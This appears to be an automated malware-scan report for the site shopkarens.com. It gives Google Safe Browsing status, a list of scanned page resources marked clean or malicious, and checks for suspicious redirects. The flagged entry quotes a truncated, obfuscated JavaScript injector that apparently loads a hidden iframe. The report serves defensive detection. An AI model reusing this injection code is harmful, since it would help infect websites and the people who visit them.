Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shopkarens.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://shopkarens.com/ | 200 OK Content-Length: 54099 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) yhmenx="s"+"p"+"li"+"t";zruo=window;firlb="dy";smtab=document;axpyfo="0x";lmsvb=(5-3-1);try{++(smtab.body)}catch(qlooqs){pjj=false;try{}catch(xroqh){pjj=21;}if(1){wmwa="17:5d:6c:65:5a:6b:60:66:65:17:61:6c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:61:6c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:2 Antivirus reports:
| ||
http://r-login.wordpress.com/remote-login.php?action=js&host=thecrosbypress.jackthreads.com&id=40309142&t=1359706109&back=thecrosbypress.jackthreads.com%2F%3Futm_source%3Djackthreads%26utm_medium%3Dtop_nav%26utm_content%3Dtop_nav%26utm_campaign%3Dtmg_network | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://s2.wp.com/_static/??-eJxdTu0KwyAQe6HZ2weT7cfYu9Rae6J3rp7r+vazMGQUAglHkgssSSGZUAabwVe8ip3XH3U+H6AaDJNYEugDO5VCcUgZqnZ24CJq5BB4gQUHZ2WfiaUlkEYklLWJvVcmG+uMNyZoX9BN0vNnK/kb2BkOPG/3iFRrnvFxulzv+qaPZ+2/9LNPtw== | 200 OK Content-Length: 120660 Content-Type: application/x-javascript | clean |
http://admin.brightcove.com/js/BrightcoveExperiences.js?ver=3.6-alpha-23334 | 200 OK Content-Length: 33041 Content-Type: application/x-javascript | clean |
http://s2.wp.com/_static/??-eJx9jtsOgjAMhl/I0RiR4IXxWWCrS5edpBsLby8gXEiiV/0P/dJCiYK8tFkhg2HgSL4yfIJDbl4Zh2kb1a8tLs/QG5RpL2XwCX2CaLMmzzCSwgAdM6YVWH0ckPlIuCx2KJFFJXRn7fLCl/tDFVJ6u/KRos8uipGwzNTD3c+Xa1vXTXNrzRuqCGE7 | 200 OK Content-Length: 45881 Content-Type: application/x-javascript | clean |
http://shopkarens.com//0.gravatar.com/js/gprofiles.js?ver=201305ac/ | HTTP/1.1 302 Found Connection: close Date: Mon, 07 Apr 2014 08:39:16 GMT Location: http://error404.000webhost.com/? Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
http://error404.000webhost.com/? | 200 OK Content-Length: 146 Content-Type: text/html | clean |
http://error404.000webhost.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 07 Apr 2014 08:39:17 GMT Location: http://error404.000webhost.com/? Server: Apache Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
http://s0.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1351637563g | 200 OK Content-Length: 582 Content-Type: application/x-javascript | clean |
http://s1.wp.com/_static/??-eJyNjksOwjAQQy9EOkFVFywQZwnTUZOQH5mkpbcnRQIhFqg7y/aTDUsSGEOhUMAyjDQbpPToLB/gK/JVJFcnExhYx1wwjsQbYO+V8trhio52Q+xMUzou4uP/skWTb+VUr8Bm0q9z7JVzwlOou9rbSP7zCVWOlcmBpZIU3sTbaMzFn4/9cBqklH1vn8dYbT0= | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://platform.twitter.com/widgets.js?ver=20111117 | 200 OK Content-Length: 98004 Content-Type: application/javascript | clean |
http://s1.wp.com/_static/??-eJyVyzEOgCAMAMAPWRuVmDAY3yLQmCpUgkW+7+bu7Yctg79ESRRThRzrznKjNlalAi5u/nRcAmQmFHqokASWvT/uDv/c/L01LcNkrDF2nKfjBXxAL2c= | 200 OK Content-Length: 1500 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163307 Content-Type: application/x-javascript | clean |
http://s.stats.wordpress.com/w.js?21 | 200 OK Content-Length: 2595 Content-Type: application/x-javascript | clean |
http://stats.hosting24.com/count.php | 200 OK Content-Length: 960 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shopkarens.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Apr 2014 08:39:13 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: shopkarens.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 07 Apr 2014 08:39:13 GMT
Server: Apache
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: shopkarens.com
Referer: http://www.google.com/search?q=shopkarens.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shopkarens.com
Referer: http://www.google.com/search?q=shopkarens.com
Result:
The result is similar to the first query. There are no suspicious redirects found.